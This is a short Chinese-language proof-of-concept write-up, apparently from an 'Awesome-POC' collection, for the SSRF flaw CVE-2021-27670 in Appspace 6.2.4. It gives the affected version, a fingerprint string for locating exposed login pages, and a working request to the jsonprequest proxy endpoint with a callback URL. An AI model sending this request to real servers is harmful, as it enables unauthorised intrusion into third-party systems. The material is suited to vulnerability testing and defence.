Awesome-POC/Web应用漏洞/Appspace jsonprequest SSRF漏洞 CVE-2021-27670.md
2024-11-06 14:10:36 +08:00

31 lines
585 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Appspace jsonprequest SSRF漏洞 CVE-2021-27670
## 漏洞描述
Appspace 6.2.4存在漏洞允许通过api/v1/core/proxy/jsonprequest接口来进行服务端请求伪造危害系统安全。
## 漏洞影响
```
Appspace 6.2.4
```
## 网络测绘
```
"Sign-in-to-Appspace-Core"
```
## 漏洞复现
登录页面为
![image-20220524140826821](images/202205241408911.png)
验证POC
```
/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://db0bx.2lfmar.yourdomain.xyz
```
![image-20220524141221709](images/202205241412770.png)